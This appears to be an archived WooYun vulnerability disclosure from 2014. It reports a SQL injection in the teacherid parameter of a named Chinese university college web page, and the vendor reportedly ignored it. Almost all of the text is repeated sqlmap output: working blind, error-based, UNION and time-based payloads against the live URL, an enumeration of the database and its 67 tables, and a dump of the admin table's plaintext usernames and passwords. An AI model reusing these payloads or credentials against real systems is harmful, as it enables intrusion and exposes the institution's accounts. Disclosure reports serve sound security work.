乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-05: 细节已通知厂商并且等待厂商处理中 2014-10-13: 厂商已经主动忽略漏洞,细节向公众公开
呵呵 管理与账号和密码很特殊,不小心把你们挖出来的
注入地址:http://dwxy.hfut.edu.cn/szdw/teacherdetail.php?teacherid=3867 (GET)
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:---Place: GETParameter: teacherid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: teacherid=3867 AND 1032=1032 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 34 columns Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: teacherid=3867 AND SLEEP(5)---web server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: teacherid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: teacherid=3867 AND 1032=1032 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 34 columns Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: teacherid=3867 AND SLEEP(5)---web server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0available databases [2]:[*] c101dwxy[*] information_schemasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: teacherid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: teacherid=3867 AND 1032=1032 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 34 columns Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: teacherid=3867 AND SLEEP(5)---web server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0Database: c101dwxy[67 tables]+-----------------------------+| user || department || duoxun_bbs || duoxun_comment || duoxun_content || duoxun_links || duoxun_members || duoxun_news || duoxun_settings || duoxun_sort || duoxun_subject || duoxun_templates || duoxun_toppic || duoxun_upload || duoxun_wordfb || dzwl_education || dzwl_news || dzwl_notify || information || messageboard || messageboard_b || pagecontent || picnews || picplay || picurl || qfzy_commentmeta || qfzy_comments || qfzy_links || qfzy_options || qfzy_postmeta || qfzy_posts || qfzy_term_relationships || qfzy_term_taxonomy || qfzy_terms || qfzy_usermeta || qfzy_users || register || sm_admin || sm_admin_cs || sm_content || sm_content_cs || sm_counter || sm_download || sm_download_cs || sm_link || sm_link_cs || sm_log || sm_menu || sm_messenger || sm_messenger_cs || sm_order || sm_order_cs || sm_setup || sm_system_priv || teacher_class || teacher_detail || teacher_detail_back20110903 || upfile || wlsys_guestbook || wlxadmin || wlxinfor || wlxinfor_back20130408 || wlxmenu || wlxpicurl || wlxteacher || wlxupfile || ww_index |+-----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: teacherid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: teacherid=3867 AND 1032=1032 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 34 columns Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: teacherid=3867 AND SLEEP(5)---web server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0Database: c101dwxyTable: user[3 columns]+--------+-------------+| Column | Type |+--------+-------------+| user | varchar(20) || id | tinyint(4) || pass | varchar(20) |+--------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: teacherid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: teacherid=3867 AND 1032=1032 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 34 columns Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: teacherid=3867 AND SLEEP(5)---web server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0Database: c101dwxyTable: user[2 entries]+-------+--------+| pass | user |+-------+--------+| admin | admin || 8888 | root |+-------+--------+
同上
过滤或者转义
危害等级:无影响厂商忽略
忽略时间:2014-10-13 09:06
暂无
